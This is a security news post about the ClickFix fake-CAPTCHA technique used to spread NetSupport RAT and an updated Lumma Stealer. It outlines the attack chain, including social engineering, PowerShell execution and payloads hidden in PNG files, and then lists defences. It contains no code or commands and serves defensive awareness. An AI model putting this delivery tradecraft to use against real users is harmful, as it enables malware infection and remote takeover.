ClickFix: The New Cyber Threat Fueling NetSupport RAT Attacks

By /

Listen to this Post

2025-02-11

Cybercriminals are constantly evolving their techniques to evade detection and compromise unsuspecting victims. One of the latest tactics observed in early 2025 is the ClickFix technique, which has been used to distribute a remote access trojan (RAT) known as NetSupport RAT. This malware, originally designed as a legitimate remote IT support tool, has been repurposed by attackers to gain full control over infected devices.

ClickFix leverages fake CAPTCHA pages to trick users into executing malicious PowerShell commands, ultimately leading to the download of NetSupport RAT. This technique has also been associated with distributing an updated Lumma Stealer variant, which uses advanced encryption to evade detection. These developments highlight a growing sophistication in cyber threats, making it more crucial than ever for organizations and individuals to stay vigilant against evolving attack vectors.

the Attack Chain

  1. Use of ClickFix: Attackers inject fake CAPTCHA pages into compromised websites.
  2. Deception Mechanism: Users are tricked into copying and executing PowerShell commands.
  3. Malware Deployment: These commands download and run NetSupport RAT from a remote server.
  4. Malicious Capabilities: The RAT grants attackers full control, including file transfer, keylogging, and remote execution of commands.
  5. Disguised Delivery: Malicious components are hidden within PNG image files to evade detection.
  6. Lumma Stealer Update: The same ClickFix method is also being used to distribute a modified version of Lumma Stealer, which now employs the ChaCha20 cipher to encrypt its configuration.
  7. Stealth & Evasion: The updated malware variants showcase enhanced anti-analysis mechanisms to bypass security solutions.

What Undercode Say: The Implications of ClickFix and NetSupport RAT Attacks

The Rise of CAPTCHA-Based Malware Delivery

CAPTCHA systems are widely used to distinguish humans from bots, making them a seemingly trustworthy mechanism. Cybercriminals leveraging ClickFix exploit this trust by injecting fake CAPTCHA pages, effectively using social engineering to bypass user skepticism. Since CAPTCHA is a routine verification step on many websites, users may not hesitate to follow the instructions provided—making this attack highly effective.

The Evolution of NetSupport RAT

Originally a legitimate remote support tool, NetSupport Manager was never intended for malicious purposes. However, its versatility and built-in remote control capabilities made it an attractive tool for cybercriminals. Unlike traditional malware, NetSupport RAT does not rely on exploiting system vulnerabilities—instead, it tricks users into unknowingly installing it. Once inside a system, it operates under the guise of a legitimate application, making detection more difficult.

Why PNG Files? The Hidden Payload Strategy

One of the more sophisticated aspects of this attack is the use of PNG image files to conceal malware components. This technique is part of a growing trend where threat actors embed malicious code inside image files, leveraging steganography to bypass security tools. By using this approach, attackers make their payloads appear harmless to traditional antivirus software.

The Link Between ClickFix and Lumma Stealer

In addition to NetSupport RAT, ClickFix is now being used to distribute an updated Lumma Stealer variant. The ChaCha20 cipher implementation in this new version indicates a shift towards more sophisticated encryption techniques, allowing attackers to better protect their command-and-control (C2) communications from interception.

Defensive Measures: How to Protect Against ClickFix-Based Attacks

To mitigate the risks associated with ClickFix and NetSupport RAT, organizations and users must adopt a multi-layered security approach:

  1. User Awareness & Training: Educate employees about social engineering tactics, including fake CAPTCHA pages.
  2. PowerShell Restrictions: Disable or restrict PowerShell execution for non-administrative users to prevent script-based attacks.
  3. Web Filtering & Domain Monitoring: Block access to suspicious or newly registered domains often used for malware distribution.
  4. Behavior-Based Threat Detection: Rely on behavioral analysis rather than signature-based detection to identify abnormal activity.
  5. Image File Analysis: Implement steganography detection tools to scan image files for hidden payloads.
  6. Endpoint Protection & Threat Intelligence: Deploy EDR solutions to detect unauthorized remote access attempts.

Conclusion: The Future of CAPTCHA Exploits in Cybercrime

The emergence of ClickFix as a malware delivery mechanism signals a dangerous evolution in cyberattack strategies. By manipulating users into executing malicious commands under the guise of security verification, attackers are refining their social engineering playbook. Furthermore, the continued enhancement of Lumma Stealer and NetSupport RAT showcases an ongoing arms race between cybercriminals and security professionals.

As adversaries refine their evasion techniques, cybersecurity defenses must evolve in tandem. The increasing use of encryption, steganography, and deceptive delivery mechanisms will continue to challenge traditional security measures, making threat intelligence, proactive monitoring, and user awareness more critical than ever. 🚨

References:

Reported By: https://thehackernews.com/2025/02/threat-actors-exploit-clickfix-to.html
https://www.quora.com/topic/Technology
Wikipedia: https://www.wikipedia.org
Undercode AI: https://ai.undercodetesting.com

Image Source:

OpenAI: https://craiyon.com
Undercode AI DI v2: https://ai.undercode.helpFeatured Image

Explore More: